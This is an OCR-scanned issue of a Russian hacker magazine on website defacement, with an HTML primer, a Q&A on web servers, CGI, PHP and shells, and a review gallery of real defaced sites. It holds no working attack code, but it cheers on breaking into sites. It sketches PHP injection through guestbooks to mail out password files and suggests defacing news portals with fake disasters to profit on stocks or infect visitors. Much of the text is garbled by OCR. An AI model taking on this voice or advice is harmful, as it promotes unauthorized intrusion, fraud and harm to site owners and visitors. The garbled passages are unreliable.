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Ну вот, дружище, ты держишь в руках уже 
второй номер Спеца по взлому. Я знаю, что 
первый (Ро5-атаки) тебе очень понравился, 
ты ведь мне об это сам и написал ;). Я учел 
все твои пожелания и сейчас уже могу 
сказать, что следующий номер будет еще 
чумовее и еще мощнее! Но о нем позже. А 
сейчас об этом номере, который ты как раз 
сейчас читаешь. 

У нас, как всегда, куча изменений. 
Например, в этом номере у нас появилась 
новая рубрика «HARD», в которой ребята из 
test_lab будут проводить сови НАКОкорные 
тестирования. На этот раз они 
протестировали для тебя (СО-мониторы. 
Зацени! 

Советую тебе также заценить свеженькие 
статьи из наших постоянных рубрик: 
WINformation, Креатив, Relax и других. Ну и, 
конечно, дефей. Много дефейса в нашей 

_ Cover Story! 

| Чуть не забыл - хотел уже распрощаться - я 
обещал тебе рассказать о следующем 
номере. Итак, тема следующего номера: 
взлом -> скнирование удаленных систем! 
On, что будет... ;). 
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Привет. Я знаю, раз ты сюда заглянул, 
значит тебе не совсем все понятно, о чем 
мы пишем в Cover Story. Точнее, тебе сов- 
сем все непонятно... ничего не понятно! 
Что за дефейс такой? Кому его делать? 
Что значит, подменить главную страницу? 
Как это изменить НТМЕ-код? Что это за 
HTML?.. Стоп! Приехали ;). Если даже уте- 
бя все до такой степени запущенно, не от- 
чаивайся - читая Спец, ты постепенно раз- 
берешься во всех этих вопросах, а я жете- 
бе пока расскажу о том, не зная чего не- 
возможно вообще ни в чем разобраться — 
welcome основы HTML :). 


НТО TAKHE BPAYSEPbI? 


Сегодня об Интернете слышали все, начиная 
от туземцев деревни Гадюкино крыжополь- 
ского района, и кончая (oops, I did it again :)) 
детьми аутистами специализированной шко- 
лы для умственно отсталых имбецилов. Раз- 
личные перцы, вроде тебя и меня, шарят по 
инету этими самыми браузерами — програм- 
мами для просмотра всяческого валяющего- 
ся под ногами добра. Изначально сеть заду- 
мывалась как система обмена данными, и 
юзвери нуждались только в текстовой инфе, 
таким образом появились сервера Gopher, 
фактически хранящие только текстовые 
файлы. Потом они были вытеснены совре- 
менными WWW-cepBepamu, которые могут 
хранить не только текст, но и разметку этого 
текста, изображения, музыку, видео, про- 
граммы, скрипты и, конечно, наши любимые 
вирусы и трояны... Если браузер прошлого 
работал в командной строке, то современ- 
ный браузер больше напоминает Франкен- 
штейна, напичканного по самое не хочу раз- 
личными плюгинами, отображающими кар- 
тинки, проигрывающими музыку и видео, по- 
нимающими десятки языков разметки... 


В ЧЕМ ОНИ ПИТАЮТСЯ? 


Ты когда-нибудь колбасился в ворде? Хе-хе 
глупый вопрос... Там ты набирал разные 
хорошие (и не очень) слова, форматировал 
текст, подкрашивал его в разные цвета, и 
выставлял разные шрифты - то, что ты де- 
Jian, называется разметкой текста (кстати 
ворд любого офиса позволяет сохранять то, 
что ты набрал не только в вордовом доку- 


менте, но и в html-daiine, если ты конечно 
установил соответствующий мастер преоб- 
разования). Так вот, HTML (Hyper Text 
Markup Language) — это базовый язык раз- 
метки Интернет документа. Почему базо- 
вый? Да потому что кроме него есть еще не- 
мало языков позволяющих демонстриро- 
вать юзверю различную инфу. Все эти язы- 
ки делятся в общем-то на две категории — 
языки разметки (HTML, XML, VRML) и сце- 
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нарные языки (Perl, PHP, ASP). Для сценар- 
ных у нас с тобой пока еще ручки коротко- 
ваты, а потому разберемся с HTML - языком 
текстовой разметки. 


НОННУРС РЕДАНТОРОВ 


Фактически термин язык не совсем точно 
отражает сущность HTML. Скорее HTML мож- 
но назвать расширенным текстом (текстом 
со свойствами), поскольку основа любого 
НТМЕ-документа - это текст со вставками 
(маркерами, операторами, тегами, назови 
как хочешь), придающими тексту различные 
свойства (шрифт, его размер, цвет, позицию 
и т.д.). Внимание, объясняю на пальцах: у 
нас есть буковка «Х», и это просто буква без 
свойств и прочего. С ней ничего нельзя по- 
делать — это просто буква. Теперь мы хотим 
выкрасить эту букву в синий цвет и накло- 
нить ее чуть вправо. Как это сделать? Надо 
объяснить браузеру, который эту букву бу- 
дет показывать юзеру, что мы хотим ее по- 
красить и наклонить, поэтому мы должны 


грацию скриптов, ActiveX элементов и т.д., 
не говоря уже об удобном HTML-editing’e. 
Правда, по секрету я тебе скажу — самые 
продвинутые порталы были сделаны в ... 
notepad’e. 


ЗАГОТОВНА ТВОЕЙ СТРАНИЦЫ 


Ладно, если с редакторами все понятно, то 
двинем дальше — разложим всю HTML требу- 
ху по полочкам. Итак, любой HTML-gokymeHT 
начинается с пролога <!DOCTYPE Пофигу>. 
Согласно спецификации HTML любой доку- 
мент должен содержать пролог, но не верь 
буржуям! Нормальному браузеру плевать с 
высокой колокольни на пролог, как впрочем 
и на следующую часть документа — заголо- 
вок, за него отвечают элементы (теги) 
<HEAD></HEAD> (сразу предупреждаю, 
каждый открытый элемент, должен быть 
впоследствии закрыт — открывающий эле- 
мент здесь <HEAD>, закрывающий 
</HEAD>). Тем не менее, в заголовке есть 
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где-то в свойствах буквы это указать. Иначе 
браузер покажет просто букву - прямую и 
черную. Вот для этого и существует HTML, он 
фактически говорит браузеру, как мы хотим 
отобразить букву (слово, текст) на экране. В 
обычном текстовом файле мы пишем свою 
букву (слово, текст) и с помощью HTML-T3- 
гов назначаем ей свойства: цвет — синий, 
наклонена. Бруазер видит эти свойства и 
согласно им отображает букву. 

Кроме этого в текст можно вставлять ссылки 
на другие документы, файлы, скрипты и про- 
чую ботву. Хе-хе, дружище, все это конечно 
прикольно, но где же лучше всего колбасить 
НТМЕ-файлы? Хороший вопрос, и ответов на 
этот вопрос до фига, если не считать туевой 


хучи различных HTML-editor’os, просто под- 
свечивающих синтаксис разметки, то есть 
еще как минимум три выневых софтины, 
позволяющих с легкостью канатоходца на 
раз-два-плюнуть сварганить себе мегасете- 
вой портал. Это банальный MS Word, стан- 
дартный Front Page Express и наконец MS 
InterDev — мощная среда, входящая в пакет 
MS Visual Studio 6.0. Из них самые продви- 
нутые средства предлагает InterDev — инте- 


две полезные фишки - это элементы <ТИТЕЕ> 
и <BASE>. Первый позволяет отображать в 
шапке окна браузера инфу о странице, вто- 
рой задает базовый URL для относительных 
урлов в документе. Давай наколбасим заго- 
товку для твоих будущих мегапорталов :). 
Посмотри повнимательнее на код заготовки, 
то что стоит в скобках <>, называется эле- 
ментом, у каждого элемента могут быть (а 
могут и не быть) свои атрибуты, например у 
элемента <BASE>, есть атрибут HREF - и его 
смысл - базовый урл. 


ВТРИБУТЫ ТУШНИ СТРАНИЦЫ 


Теперь разберемся с тушкой нашей страницы, 
а именно с элементом <BODY>. Скажу сразу, 
что элементов и атрибутов там столько, что 
черт ногу сломит, а мы уж с тобой и подавно, 
поэтому возьмем только основы, а с осталь- 
ным разберешься сам. Атрибут BGCOLOR - это 
фоновый цвет документа, TEXT — цвет текста 
документа, LINK — цвет текста непосещенной 
ссылки, VLINK — цвет посещенной ссылки, 
ALINK — цвет активной сслылки (в тот моент 
когда юзверь щелкнул по ней), BACKGROUND 
— картинка, используемая в качестве фона 
(если она отсутствует, то используется фон 
указанный в BGCOLOR). Как видно из HTML- 
кода, цвета можно указывать как в шестнад- 
цатеричном виде (RGB = #805080), так и в ви- 
де названия цвета (RED, MAGENTA и т.д.). 
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HTML предоставляют тебе эту возможность 
— теги <Н1>, <H2>, <H3>, <Н4>, <H5>, <H6>. 
Первый тег <Н1> отвечает за самые глав- 
ные и крутые заголовки, <H6> - за полную 
фигню. По ходу текста ты можешь изме- 
нить его размер и цвет при помощи тега 
<FONT> и его атрибутов — SIZE (отвечает за 
размер шрифта), и COLOR (соответственно 
за цвет). Свой текст ты можешь комменти- 
ровать картинками, для этих целей служит ag? i ny a pag teass: 

>: анусом м п меру if больш Войутора ATO в вены 
элемент <IMG>, имеющий десяток атрибу- i: re ae 
тов, в принципе можно обойтись и двумя, I 
главными — SRC (адрес картинки (URL)) и 
ALIGN (позиционирование картинки отно- 
сительно текущей текстовой строки). Кста- 
ти, тут есть одна хитрость — помнишь в на- 
чале упоминался элемент <BASE>, так BOT 
атрибут SRC элемента <IMG>, если в заго- в у 
ловке имеется <BASE> с базовым адресом ии 
твоей страницы, может содержать относи- : 
тельный адрес картинки (например 
«Images/background.jpg», реально изоб- rant 
ражение будет прочитано по адресу М Smmorin, fo с Rese поненнеюя 
«www.vasya-pupkin.ru/Images/back- в Roles paged 
ground.jpg»). Абзацы в твоем тексте выде- ева 
ляй при помощи тега <Р>. 
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Кроме того, рано или поздно (лучше рано) 
ты столкнешься с проблемой помещения на 
твоей странице ссылок на другие докумен- 
ты, тогда на помощь приходит элемент <А> 
с двумя главными атрибутами — МАМЕ и HREF. Первый атрибут нужен для переходов 

внутри документа, а второй для перехода 

на другие документы. Формат этого элемен- 

та таков: <A HREF=»http://www.baltika.ru»> Baltika 
Brewery </A> . При этом текстом ссылки 
a будет “Baltika Brewery”, а адресом no кото- 
Какое р | лю и : pomy произойдет переход - 
«http://www.baltika.ru». Здесь кроется 
еще одна тонкость. Если ты задал заранее 
элемент <BASE> в заголовке, а урл в эле- 
менте <А> у тебя выглядит так - 
—— ь «www.baltika.ru», то переход у тебя про- 
изойдет по адресу «www.vasya- 
pupkin.ru.www.baltika.ru», что сам понима- 
ешь к хорошему не приведет. Если ты хо- 
чешь, чтобы в качестве урла фигурировало 
твое мыло, то нет ничего проще: <А 
HREF=»mailto:designer@vasya- 
pupkin.ru»>. Если же тебе надо, чтобы 
сслыка была картинкой (или наоборот, что 
в сущности одно и тоже), то вместо текста 
1 ссылки (Baltika Brewery) укажи элемент 
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<IMG> со всей необходимой требухой: <A 
HREF=»http://www.baltika.ru»> <IMG 
SRC=»Images/baltika.jpg» | ALT=»Baltika 
Brewery»> </A>. 


: - Воти все, что надо знать, чтоб суметь сде- 
И TOM 0 ¢ ROM OME ОЖ» ООС Г. 4 ТО © Камни Е лать хоть что-нибудь :). 


Уре аж, Te Я 


Что такое дефейс? 


Это процесс насильственного снятия 
лица. По виртуальным просторам 
бродит множество пластических хи- 
рургов, которые так и мечтают ото- 
брать твое лицо, или лицо твоего 
сайта. Конечно, нужно поставить что- 
то в замен. Поэтому хирурги часто 
предлагают свои варианты дизайна 
твоего сайта. Суть в том, что ты од- 
нажды набираешь адрес своей до- 
машней странички и видишь сообще- 
ние о том, что тебя поимели. Это со- 
общение увидят и все остальные по- 
сетители твоей паги. А теперь пред- 
ставь себя руководителем крупной 
компании, который на сайте своей 
фирмы по установке систем безопас- 
ности видит силиконовых теток и ха- 
керскую матерщину. Скандал! 


Что такое главная страничка? 


Когда ты набираешь имя сервера ти- 
па: http: //www.my_server.com, To Te- 
бя выкидывает Ha первую страницу 
по умолчанию. Главная страница за- 
гружается всегда, когда ты набира- 
ешь адрес. Чтобы загрузить осталь- 
ные страницы нужно прописывать имя 
документа, например: 

http: / /www.my_server.com/docu- 
ment.html. Главную страницу обычно 
зовут index.html или main.html. Но 
чтобы ее загрузить не придется пи- 
сать 

http: / /www.my_server.com /index.html 
. Все потому, что веб-сервер cam ав- 
томатически перекидывает на эту 


страницу при наборе 
адреса 

http: / 7www.my_serv- 
ег.сот. 

Во время простейшего де- 
фейса хакер вместо глав- 
ной странички ставит свою, 
так и появляются голые тетки 
вместо безопасности. 


Что такое WEB-cepsBep? 


Это такая программа, которая стоит 
на сервере. Эта софтина в ответ на 
запросы твоего браузера выдает нуж- 
ные документы. Например, на запрос 
твоего \/ЕВ-клиента 

http: / /www.my_server.com/docu- 
ment.html отсылает тебе документ в 
формате HTML. А на запрос 

http: / /www.my_server.com/popa.jpg 
она отсылает тебе картинку. Такая 
программа называется WEB-cepse- 
ром, поскольку предоставляет клиен- 
ту услуги (сервисы) WEB. Общие зна- 
ния по работе и устройству WEB-cep- 
веров необходимы дефейсеру так же, 
как необходимы знания устройства 
женских бюстов пластическому хи- 


pypry. 


Что такое HTML? 


HyperText Markup Language (гипертек- 
стовый язык разметки) нужен для то- 
го, чтобы расположить на страничке 
текст и картинки. В виде HTML хра- 
ниться большинство страничек в ин- 
тернете. Ты можешь посмотреть 
НТМЕ-код любой странички, на кото- 


рую зашел. Для 
этого нужно найти в 
твоем браузере опцию 
зоигсе (исходный код). Что- 


бы намутить прикольный де- С 
фейс хакер должен хотя бы чуть- 
чуть знать HTML. Знание этого языка 
помогает взломщику прилепить кар- 
тинку с сиськами и написать грязные 
подписи на главной страничке. Хотя, 
можно воспользоваться НТМ!-редак- 
тором, который обычно не сложнее 
чем paintbrush. Такой редактор пре- 
образует визуальное изображение 
странички в HTML. 


Что такое НТТР? 


HyperText Transfer Protocol нужен 
для того, чтобы передавать HTML до- 


кументы и другие данные от сервера к клиенту (Браузеру) 
и обратно. Клиент посылает серверу НТТР-запросы, а сер- 
вер возвращает клиенту НТТР-ответы. Когда ты пишешь в 
адресной строке http: //www.popa.com/popa.jpg, означа- 
ет: отправляю НТТР-запрос серверу www.popa.com Ha по- 
лучение картинки popa.jpg. В ответ начинает загружаться 
картинка с попенью, это значит, что сервер ответил НТТР- 
ответом с картинкой. НТТР - основной протокол на кото- 
ром работает WWW, поэтому хакер-дефейсер должен 
знать его также хорошо, как пластический хирург знает 
способы накачки грудей силиконом. 


Что такое браузер? 


Если ты еще не догнал, это такая программа, которая 
умеет общаться с сервером по протоколу НТТР, 
умеет преобразовывать закаченный HTML в 
визуальный вид. То есть эта та программа, с 
помощью которой ты лазаешь по интерне- 
ту. Такую программу можно назвать WEB- 
клиентом, поскольку она пользуется сервиса- 
ми WEB-cepsepa. Для того чтобы провести не- 
ый которые дефейсы достаточно браузера. Ведь 
) некоторые сайты ломаются через адресную 


строку. 


Z ee ‘ti, oy, 


Что такое такое URL? 


Universal Resource Identifier (Уни- 
4 зерсальный Идентификатор Pe- 
<P сурса) нужен чтобы точно ука- 
зать положение ресурса в ине- 
те. Например URL 
Www.popa.com \ zadnici\popa1.jpg 
говорит о том, что требуемая фотогра- 
фия зада находится на сервере 
WWww.popa.com, в каталоге zadnici. Часто, 
знание URL, в которых лежат исполняемые 
программы на сервере сильно помогают де- 
фейсеру. Ведь зная такой URL, хакер может 
сформировать НТТР-запрос к нужной про- 
грамме. 


Что такое CGI? 


Common Getaway Interface (единый шлюзо- 
вый интерфейс) нужен для того, чтобы ты 
мог общаться с дополнительными программа- 
ми. Их цепляют к серверу через шлюзовый 
интерфейс. WEB-cepsep в чистом виде умеет 
выдавать только готовые НТМЁ-документы, 
картинки и прочую статическую инфу, при ус- 
ловии, что ты правильно укажешь их URL. To 
есть, если ты знаешь точное их расположение 
на сервере. Например, когда ты кликаешь ссылку 
на \/ЕВ-страничке, то URL формируется твоим брау- 
зером. А браузер вылавливает URL для этой ссылки 
из НТМЕ-документа. А если сервер большой и на 
нем хранятся миллионы страничек HTML, то для того, 
чтобы прочитать все ссылки и найти нужную, тебе потре- 
буются годы. Чтобы ты не состарился, лазая по серверу, 
нужен поиск. Чтобы организовать поиск, прикрутить к сер- 
веру счетчик, базу данных, чат, гостевую книгу и прочие 
динамические объекты нужен CGI. 


Как работает CGI? 


Например, у тебя стоит WEB-cepsep и ты хочешь, чтобы 
юзеры постили тебе в гостевую книгу. Гостевая книга, до- 
пустим, храниться в book.html и пользователю нельзя раз- 
решать его редактировать. 

Юзер вводит свой текст в окошке \\/ЕВ-странички и нажи- 
мает кнопку «записать в гостевую книгу». Тогда его брау- 
зер отправляет НТТР-запрос на передачу текста (перемен- 
ных) программе СС! (шлюзу). Какой программе, и через 
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Прелесть этого языка в том, что он 
заточен под обработку всяких стро- 
ковых переменных, то есть он очень 
удобен для написания СС|-приложе- 
ний. То, что на Си требует написания 
специальных модулей, на Perl умеща- 
ется в одну строку. Прелесть языка 
еще в том, что программы не нужно 
предварительно компилировать. Файл 
с текстом программы можно сразу 
запускать. Также как браузер компи- 
лирует текстовый HTML в визуаль- 
ный вид налету, также сервер 
компилирует налету текстовый 


Perl и выдает результаты его 
работы. Естественно, для этого 


на сервере должен быть уста- 
| новлен интерпретатор перло- 
вых команд. 

Перловые скрипты на сервере - 
рай для хакера. Дело в том, 
что в эти скрипты через пере- 
менные можно передавать целые 
куски кода. Получается, что дефей- 
сер может модифицировать скрипт 
через переменные. Конечно, это 
можно делать только в скриптах с 
незащищенными переменными, в 
скриптах с ошибками. Но таких, будь 
уверен, в сети предостаточно. 


i 
т 
1 
‹ | Что такое Exploit? 


i. 
ож Эксплойт, это такая программа или 
Sg ‘ часть кода, которая EXPLOIT ‘upyet 
= (эксплуатирует) ошибку, дырищу, уяз- 
_вимость в СС|-скрипте или в самом 
' д МЕВ-сервере. В интернете валяются 
= кучи эксплойтов на все случаи жизни. 


какие переменные передавать текст, 
браузер узнает из кода HTML. Когда 
WEB-cepsBep получает такой запрос, 
он передает его в нужный шлюз. 
Программа-шлюз запускает ‚другую 
программу - текстовый редактор, от- 


крывает в нем файл HTML и добавля- 


ет в него текст пользователя. Конеч- 
но, программа CGI может сама иметь 
встроенный текстовый редактор, но 
важно то, что она умеет запускать 
другие программы. CGI может co- 
здать новую страничку на сервере, 
может перезапустить сервак, может 
добавлять и удалять записи в базе 
данных. Словом шлюз можно научить 
делать с компом все, что смог бы де- 
лать ты, если бы сидел за клавиату- 
рой и монитором сервера. 

А теперь представь, какое поле де- 
ятельности для хакеров! Ведь в 
CGl-ckpuntax роятся тысячи багов. 
Если передать СС|-программе не- 
верные переменные, она может 
сглюкнуть и дать хакеру доступ к 
своим потенциальным возможнос- 


ее 


ли используют стандартны 
CGI, или используют ста 
языки типа Perl, для на 
программ. Вообще шлюзе 


сервер на наличие СС!`шек 
рых известно, что они содержа 
кие-то ошибки. Сисадмину так 
грамма позволит защитить свой сер 
вер от хакеров, а дефейсеру она по- 
может обходить сисадминов. 


Что такое Perl 


Перл, это язык немного похожий на 
Си, немного на JavaScript, немного | \ 
на язык оболочки в ИМХ-системах. 

| 


a =. 


Поэтому совсем не обязательно 

= =" писать их самому. Однако ec- 
sy 2P плохо представляет себе: 

an работает сервер, язык на кото- 
ром написан Эксплуататор, и вообще 
как это действует, то вряд ли ему 
удастся стать \/ЕВ-рабовладельцем. 


Что такое, уязвимос 
М/ЕВ-сервера? 


Поскольку сервер отвеча- 

ет за выдачу главной и 

других страниц любому 
пользователю. Один из спосо- 

бов заменить главную странич- © 

ку (то есть сделать дефейс) - К 
вмешаться в работу WEB-cepsepa. \ 
Чем сложнее \\/ЕВ-сервер, тем про- 
ще его сломать. Ведь \/ЕВ-сервисы 
обычно совмещены с почтовыми, с 
FTP, к сайту прицеплены через CGI 
гостевые книги, базы данных, счет- 
чикизи прочие Прикладные програм- 
мы. В чём-то ИЗ этого можно запро- 
CTO Найти стандартную уязвимость. 
Как Tl yeke знаешь, существуют ска- 
неры уязвимостей. Списки уязвимос- 
тей для конкрётных серверов и Экс- 
плуататор тих дырок выкладывают 
в интернете бывалые хакеры для об- 
мена опытом, а также сисадмины 
для борьбы с хакерами. Предупреж- 
денузначитевооружен. 


= a Г ий 
Что такое РНР? 


РНР сначала расшифровывался Kak Professional Home Раде 
tools, а теперь под этим понимают PHP Hypertext Pre- 


= 
* 
= 


| Processor. То есть PHP - это npo- 
= фессиональный инструмент для ги- 
пертекстового предпросчета домаш- 
них страничек. 
Админов больших порталов парит 
каждую текстовую статью (из тысяч) 
заверстывать в НТМЁ со всеми ме- 
нюшками, банерами, формати- 
рованием, дизайном. Намного 
проще раз и навсегда свер- 
стать один НТМЁ-шаблон, и 
уже туда подгружать нужные 
тексты и картинки из базы 
= или из обычных текстовых ли- 
= бо графических файлов. Pe- 
шение дает РНР. Теперь WEB- 
— мастера могут встраивать в HTML- 
код небольшие куски на Perl. Вме- 
сто того чтобы геморроиться с 
внешними скриптами, теперь мы 
посадили их прямо в тело HTML- 
странички. Когда браузер загружа- 
ет страничку, встроенный РНР ис- 
полняется и подставляет вместо 
себя нужную инфу. На сервере у 
нас лежит один HTML, а к пользо- 
вателю уходит сто его разновидностей. Ведь каждый РНР 
отвечает за генерацию своего куска НТМ!-кода в стандарт- 
ном шаблоне. Пользователь получает стандартный HTML 
плюс то, что нагенерили скрипты. 
Эта технология, конечно, сильно облегчает жизнь WEB-mac- 
терам, и одновременно открывает новые возможности для 
дефейсера. Если сервер умеет запускать скрипты РНР пря- 
мо из НТМ!-заготовки, то остается внедрить свои злобные 
хакерские скрипты в такую заготовку. Такую возможность 
предоставляет незащищенная гостевая книга или конферен- 
ция на сайте. То есть, хакер постит в гостивуху свой РНР- 
скрипт. Скрипт сохраняется в базе, при следующей загруз- 
ке гостевухи скриптович исполняется и мылит хакеру файл 
с паролями. От этого можно защититься, если в РНР запре- 
тить скрипты в сообщениях. Только запреты должны быть 
достаточно изощренные, так как простые запреты обходят- 
ся стандартными способами. 


Используется ли Perl и РНР на серваках 
под управлением Windows? 


Вообще у Windows для этих целей используется ASP и 

VBscript, только Рес РНР настолВЖо полюбили про- 

граммисты, что перенесли ero на платформу 
Windows, также как и юниксовый \\/ЕВ-сервер 

Apache. Но к бесконечному хакерскому счастью 
скрипты под Винды Алючат намного круче, 
чем под никсыСломать сервер под управ- 
лением Windows намного проще, fem 
сервак под никсом. 


Что такое ASP? 


Active Server Раде (Актив- 
Ная серверная странич- 

ка) используется поч- 
ТИ Также, как РНР. 
В НТМЕ шаб- 


| 
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NOH записываются вставки Ha Visual 
Basic script (VBscript) или Ha 
JavaScript (JScript). Когда cepBep вы- 
дает страничку, TO скрипты исполняют- 
ся и заменяют себя на куски НТМ!-ко- 
да. С помощью этой технологии мож- 
но намутить базу данных, гостевуху, 
или просто сделать целый сайт на од- 
ном НТМЁ-шаблоне. Чтобы не верстать 
каждый НТМЁ-документ. Кроме виндов 
ASP поддерживают некоторые никсы, 
но там оно не родное и используют 
его редко. Конечно, изучать Перл на- 
много выгоднее, чем вижуалбасик, 
ведь крутые серваки висят под никса- 
ми. Но если хакер решил сломать сер- 
вер, на котором крутиться АЗР, то без 
VBscript не обойтись. Приколись, не- 
которые Windows-cepBaku умеют во 


eas 


делать из командной строки все, что 
можно вообще сделать с компом под 
этой операционной системой. Если у 
хацкера есть shell на каком-нибудь сер- 
вере - значит, он может там запускать 
скрипты. Эти скрипты могут пытаться 
подбирать пароли или атаковать другие 
сервера. Возможности Shell зависят от 
прав, под которыми висит хакер. Если 
в результате атаки на сервер дефейсер 
получил права на заливку или запуск 
какого-нибудь файла, то это поможет 
ему заменить содержимое сайта. 


_ Что такое telnet? С 


Это протокол, который позволяет уп- 
равлять сервером на расстоянии. Фак- 
тически телнет дает тебе возможность 
напрямую вводить команды Shell са- 
мым естественным образом. Конечно, 
нужно знать язык Шелла. У одного и 
того же юникса может быть десяток 
разных оболочек. У Windows тоже есть 


возможность зателнетиться и навре- 
ДИТЬ. Однако многие админы отключа- 
ют телнет на своих севаках. Задача 
многих хакеров включить telnet назад и 
взять сервер под свое управление. 


НЕКОТОРЫЕ НЕСОЗНАТЕЛЬНЫЕ АДМИНЫ ЗАГТУСКАЮТ 
CGI-CKPUNTbI ПОД ПРАВАМИ АДМИНИСТРАТОРА, ЕСЛИ 
ХАКЕР НАЙДЕТ ДЫРИЩУ В TAKOM СКРИГМПЕ, TO 
ПОЛУЧИТ SHELL АДМИНИСТРАТОРА 


можно, НАПРИМЕР, СООБЩИТЬ О ТОМ, ЧТО BCE 
ЗДАНИЯ MICROSOFT СГОРЕЛ СЕГОДНЯ НОЧЬЮ И 
СКУПАТЬ УТРОМ АКЦИИ БИЛЛШИ ПО ДАРМОВОЙ ЦЕНЕ. 
словом нА ПАНИКЕ ЗАРАБОТАТЬ ЛЕГКО, И С 
ПОМОЩЬЮ 8ДЕФЕЙСА РЕАЛЬНО ЕЕ УСТРОИТЬ 


вставках ASP понимать Perl! Кстати 
CGI под винды тоже любят писать на 
высушилбарсике. Только все больше 
виндовых серваков переходит Ha Perl, 
уж больно геморный барсик. 


Shell - можно перевести как оболочка. 
Шелл — это, по сути, командная стро- 
ка. Среди хакеров такая жуткая шела- 
мания из-за того, что юникс позволяет 
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Шелл может быть не явным, TO есть KO- 
манды для операционной системы сер- 
вера придется вводить каким-нибудь ле- 
вым образом вслепую. Например, ко- 
манды нужно будет постить через ад- 
ресную строку браузера для определен- 
ного скрипта, который имеет дырку. 
Точнее хакер заставляет СС|-скрипт от- 
крыть Shell и в этой командной строке 
набирать хакерские команды. Понятно, 
что все происходит фактически вслепую. 
Поэтому дефейсер старается через эту 


файлы других 
скать программы. Ес- 
ользовательские права 

го он big ay повысить 


no! о ичка Ha KaKOM- iden 
хостинге, OH может редактираав фай- 
лы. своей паги, но чужие сайты ему не- 
‘доступны. Сейчас очень часто на одном 
сервере висит несколько. сайтов. Один 
из способов повысить права - запустить 
программу, которая переполнит память и 
вклинится в область программ с более 
высокими правами. Дело в том, что у за- 
пущенных программ те же права, что у 
их хозяина. И если программу запустил 
админ, а xakep туда вклинился... 

1 | ые админы за- 
скрипты под правами адми- 
нистратора, если хакер найдет дыришу 
в таком скрипте, то получит Shell адми- 
нистратора. Если дефейсер теперь хозя- 
ин сайта, то смена-рожи - не проблема. 


_Как заработать на дефесе? — 
Только некоторые журналисты из ла- 
мерских изданий думают, что хакеры 
делают дефейсы для самовыражения. 
Конечно, можно тупо ломать чьи-то де- 
шевые домашние странички. Но пред- 
ставь, что дефейсер получил доступ к 
содержимому крутого новостного пор- 
тала. Представь, что ты можешь опуб- 
ликовать любую чушь в крупнейшей го- 
родской газете. Можно, например, со- 
общить о том, что все здания Microsoft 
сгорели сегодня ночью и скупать утром 
акции Билли по дармовой цене. Сло- 
вом на панике заработать легко, и с 
помощью дефейса реально ее устро- 
ить. Новостей много и если подкорек- 
тировать не очень заметные сообще- 
ния, то это обнаружат не скоро. 

Хакер может разместить на чужой стра- 
ничке скрипт-вирус, чтобы заражать по- 
сетителей странички, которые ей дове- 
ряют. А можно просто крутить счетчик 
на своем доморощенном порносайте с 
помощью нескольких дефейсов. 


Мне сказал приятель, что дефейс 
- это тупо и бесперспективно! 
Ну, это как посмотреть. \/ЕВ-техно- 
логия стала настолько гибкой и 
удобной, что интерфейсы WEB ста- 
я управления настройками 

‹ принтеров, блоков беспе- 
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картинная галерея для кибБерпанков 


Что есть киберпанковское искусство? Имхо, это 
дефейс. Никакие киберпанковские рассказы, 
альтернативно выглядящие сайты и прочее не могут 
сравниться с этой штукой по стилю и 
андерграундности. Давай же пройдемся по самым 
оригинальным, самым прикольным, веселым и 
необычным дефейсам за последнюю пару лет. 


mopy (mopy@xakep.ru) 


КАК «ЧИТАТЬ» ДЕФЕЙС? 

Многие перцы, в первый раз видящие дефейс, вообще не могут понять, что 
это такое. Несмотря на то, что большинство дефейсов схожи по структуре. 
Итак, какие общие вещи попадаются практически во всех дефейсах: 


Admin — обращение к админу взломанного сайта. Чаще всего тут пишут о 
том, как был взломан сайтец. Но попадаются и такие крендели, которые ма- 
терят тут админа, сообщают ему, что он ламо и все такое. Также тут можно 
часто встретить фразу, говорящую админу, что никакая инфа не была унич- 
тожена и что оригинальные исходники сайта лежат в такой-то дирректории. 


Greetz — типа приветствия. Тут хацкеры перечисляют своих друганов либо 
просто чуваков, которых они уважают. Сюда же пихаются все названия 
всех дружественных хак-команд. 


Fuckz — дисхонор. Противоположно по значению «Greetz». Чел может впи- 
сать сюда всех, кто его достал, вражеских перцев из конкурирующих групп 
и, самое главное, организации/людей, которые явились мотивом к совер- 
шению дефейса (например, ФСБ, правительство и тд.). 

Owned by/Hacked by/Cracked by/was here — взломанно таким-то. Тут хацкер 
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гордо пишет свой собственный ник и название команды, в которой он состоит. 
Кстати, «site owned Бу Нах0г» можно перевести как «сайт поимел Нах0г» :). 


Thankz — благодарности. Иногда перемежается с «Greetz», но несет немного дру- 
гое значение. Тут пишут благодарности тем, кто помогал (информацией, советами, 
физически) задефейсить сайт. Также в «Thankz» часто пишут благодарности тем, 
кто вдохновил цаксора на дефейс, например, своим девушкам ;). 


For contacts — для связи. Хех, тут оставляют мыло для мата. Иногда остав- 
ляют аську, канал ТВС и ссылку на хоумпаг хацкерской команды. 


Вот, в принципе, и все. Зная это, можно разобраться практически в любом 
дефейсе. Несколько дефейсов мы разберем с тобой вместе, а дальше ты 
уже сам начнешь понимать, что и как. А если неохота вникать в суть каждо- 
го дефейса, просто наслаждайся красотой и юмором и киберпанковской ат- 
мосферой. Как я уже говорил, дефейс - это и есть киберпанковское искус- 
ство. 

Начнем с самого простого. Взгляни на скриншот. (Рис. 1. Дефейснут: 
www.mkphotography.com Дефейснул: Evil Angelica) Прикольно? Да уж, тут 
разбирать собственно нечего — все и так понятно. Этот беспредел — дело рук 
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Самые оригинальные дефейсы 


одного довольно авторитетного дефейсера, известного под ником Evil 
Angelica. Лично я сомневаюсь, что это девушка :), но буду говорить о дефей- 
сере, как о девушке. Итак, Злобная Анжелика очень активна в своем творче- 
стве — проделала огромное количество дефейсов, гораздо больше, чем мно- 
гие дефейсмент-группы (а может Evil Angelica тоже дефейсмент-группа?). И 
по ее работам чувствуется, что это очень эмоциональное существо ;). Видимо, 
ее в очередной раз кто-то достал, что вылилось проблемами для админа сай- 
та www.mkphotography.com :). Нефига оставлять дырки!!! 

И сразу еще один дефейс от Злобной Анжелики. (Рис. 2. Дефейснут: 
www.oldthorns.com Дефейснул: Evil Angelica В центре странички встав- 
лен мувик, действия происходящие в котором, ты можешь наблюдать на ма- 
леньких скриншотах. Цинично, зло и прикольно :). Так прикалывается 
Злобная Анжелика. Кстати, как видешь, она плевать хотела на такие обще- 
принятые фишки, как обращение к админу и тп. Просто дефейсит и все. 


Рис. 3. Дефейснут: www.technetservice.com Дефейснул: Evil Angelica) 
Опять же Злобная Анжелика. Хоть ее дефейсов в нашем обзоре и так отбав- 


ляй, этот я обойти никак He мог. Ну что поделаешь, раз уж Evil Angelica де- 
лает такие прикольные дефейсы и в таком большом количестве, значит, она 
